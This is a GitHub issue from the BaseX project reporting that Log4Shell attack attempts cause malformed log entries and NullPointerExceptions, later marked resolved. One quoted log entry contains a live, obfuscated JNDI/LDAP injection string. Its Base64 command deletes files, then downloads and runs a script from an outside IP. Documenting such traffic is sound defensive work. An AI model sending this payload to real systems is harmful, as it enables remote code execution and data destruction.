search

BaseXdb / basex

BaseX Main Repository.
http://basex.org
BSD 3-Clause "New" or "Revised" License
661 stars 267 forks source link

Logs: Haywire log entries when attacks take place #2275

Closed ChristianGruen closed 4 months ago

ChristianGruen commented 5 months ago

(Harmless) Log4Shell attacks may lead to undesired log entries (when using Jetty):

<entry
  time="20:26:43.636"
  address="t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//141.147.79.97:6583/TomcatBypass/Command/Base64/cm0gLXJmICogOyB3Z2V0IC1PIHN5c3RlbTM2LnNoIGh0dHA6Ly8xNDEuMTQ3Ljc0LjE1L3N5c3RlbTM2LnNoIDsgY3VybCAtbyBzeXN0ZW0zNi5zaCBodHRwOi8vMTQxLjE0Ny43NC4xNS9zeXN0ZW0zNi5zaCA7IGNobW9kICt4IC90bXAvcGFyYWlzby54ODYgOyBjaG1vZCA3Nzcgc3lzdGVtMzYuc2ggOyBzaCBzeXN0ZW0zNi5zaCA7IC4vc3lzdGVtMzYuc2ggOyBybSAtcmYgc3lzdGVtMzYuc2g=}'):54450"
  user="admin"
  type="REQUEST">[GET] /</entry>

Related, questionable requests may lead to NullPointerExceptions:

<entry
  time="19:17:25.492"
  address="91.92.245.67:46348"
  user="admin"
  type="500"
  ms="2.1">Unexpected error: Improper use? Potential bug? Your feedback is welcome: Contact: basex-talk@mailman.uni-konstanz.de Version: BaseX 11.0 beta Java: Eclipse Adoptium, 21.0.1 OS: Linux, amd64 Stack Trace: java.lang.NullPointerException</entry>
ChristianGruen commented 4 months ago

Resolved (785adf76e9eb613b8ae46423484a3ca62f84e078, d527342f8c618e6c3981d56e976896310ef78d40).